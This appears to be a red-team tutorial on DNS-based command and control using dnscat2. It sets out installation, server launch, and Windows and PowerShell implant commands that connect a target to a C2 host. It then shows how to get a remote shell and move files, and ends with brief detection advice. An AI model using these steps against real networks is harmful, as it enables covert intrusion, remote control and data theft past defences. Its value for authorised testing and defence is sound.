Even in the most restricted environments DNS traffic should be allowed to resolve internal or external domains. This can be used as a communication channel between a target host and the command and control server. Commands and data are included inside DNS queries and responses therefore detection is difficult since arbitrary commands are hiding in legitimate traffic.
Implementation of this technique is possible with the use of Dnscat2 which can create a command and control channel over the DNS protocol. This tool uses a client (implant) which is based in C and it needs to be executed on the target in order for the server to receive a connection. Traffic is transmitted in an encrypted form and also it supports authentication via pre-shared secrets.
Installation of this tool is easy by following the commands below from a Kali Linux 2.0 machine.
git clone https://github.com/iagox86/dnscat2.git cd dnscat2/server/ bundle install
The command and control server can initiated by using the following command.
ruby dnscat2.rb --dns "domain=pentestlab,host=192.168.1.169" --no-cache
A compiled version of the client (implant) for Windows systems can be downloaded directly from here. From the command prompt of the target the only requirement is to specify the DNS server in order to establish a connection with the C2 (Command & Control) server.
dnscat2-v0.07-client-win32.exe --dns server=192.168.1.169
From Dnscat2 the red teamer can start the interaction with the existing session that has been created:
session -i 1
By executing “help” a list of available commands for usage can be retrieved:
Part of the functionality of dnscat2 is to upload and download files, execute other programs and obtaining a remote shell.
Obtaining a shell is easy with the “shell” command which will open another session:
The following output will appear on the command prompt of the target:
The shell will be interactive and fast and all the commands will be transferred over DNS traffic:
Launching another program remotely is possible by calling the executable:
Luke Baggett developed a PowerShell version of the implant which have been introduced and described in the blackhillsinfosec website. The commands are the same but additional features have been added like interactive PowerShell session and ability to run scripts directly from memory.
The following command needs to be executed from a PowerShell session on the target:
PS C:\> start-Dnscat2 -Domain pentestlab -DNSServer 192.168.1.169
It is also possible to establish a direct PowerShell session by running the following:
A new console will created with the ability to execute PowerShell commands and scripts:
There are various advantages of command and control over DNS with dnscat2. Some of them are:
- Support of multiple sessions
- Traffic encryption
- Protection from MiTM attacks with secret key
- Run PowerShell scripts directly from memory
Since detection is difficult due to the fact that arbitrary commands are transferred behind legitimate DNS traffic emphasis should be given to monitor the length of DNS queries and to allow hosts to communicate only with DNS servers that are trusted.